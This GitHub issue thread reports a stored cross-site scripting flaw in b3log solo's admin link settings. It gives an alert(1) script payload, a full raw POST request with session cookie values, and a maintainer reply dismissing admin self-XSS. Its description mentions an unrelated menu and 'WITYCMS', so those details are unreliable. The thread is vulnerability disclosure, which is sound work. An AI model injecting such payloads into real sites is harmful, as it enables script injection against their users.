### ISSUE TITLE
后台连接管理存在xss  

### ISSUE THREAD

**Issue by twoHub** [b3log/solo#12501]
A cross-site scripting (XSS) vulnerability found in the Input page under the "Publish Articles" menu in b3log 2.9.3 with an ID of "linkAddress" stored in the "link" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a WITYCMS/Admin-authenticated HTTP request.

playload：https://hacpai.com“### </div><script>alert(1)</script>
POST /solo/console/link/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/solo/admin-index.do
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 112
Cookie: JSESSIONID=22C97DB99F35BC53B730E0183DCEDF33; b3log-latke=3e388c84427cdd7d668feee868aa6b55d89aa5c2b5119ed52bbd56744b21d12f28e55086370891a751a4003bccba3305c81270aaaf8ead0390d8264d25ca050111dd502b85701dd567dfa55ddcfeb0c88e1362dc190cbd5a82f9c6ec57244e5c95365eb305bbf74a4cac680050ddd2a2f46e434394309407834ad36d982575b0b239a8e9cdccd3d6afd08d511b193cf8; skin=""; visited=%5B%22%2Fsolo%2F%22%2C%22%2Fsolo%22%5D; solo=732e32b4c3cbba398e9012784ab5b73c295359e8b0693e6deaeeae3f18a058ff18febda19a130a4a08601977936a1d388a2a7470b664da220743a54f41562c41eb3e43f3634722e52baef59e5e7e9668169423475336e205488bb94db600fafe860096ddb4a863d7348ede1eed7f2ccd42153d5ebfad4d4b698496a4db150b3a04fd92a0a7219620ddef64163cb734f16e90d4dbe3a0bc03c0b96e90c52126898a3ae56da918e1492ffa8756ffb98bcc
Connection: close

{"link":{"linkTitle":"123","linkAddress":"https://hacpai.com"###</div><script>alert(1)</script>","linkDescription":""}}
![default](https://user-images.githubusercontent.com/33438164/45283066-6943fb80-b50f-11e8-919b-f9dfc3c1b324.png)
![default](https://user-images.githubusercontent.com/33438164/45283044-592c1c00-b50f-11e8-8eeb-e04dbe0b517e.png)
![default](https://user-images.githubusercontent.com/33438164/45283077-72cd6380-b50f-11e8-8d1b-5b610af99d2d.png)
![default](https://user-images.githubusercontent.com/33438164/45283104-88db2400-b50f-11e8-9501-67f97cf1d351.png)

**Comment by 88250** [comment]
后台很多地方都可以输入脚本的，管理员自己 XSS 自己没必要吧 😳
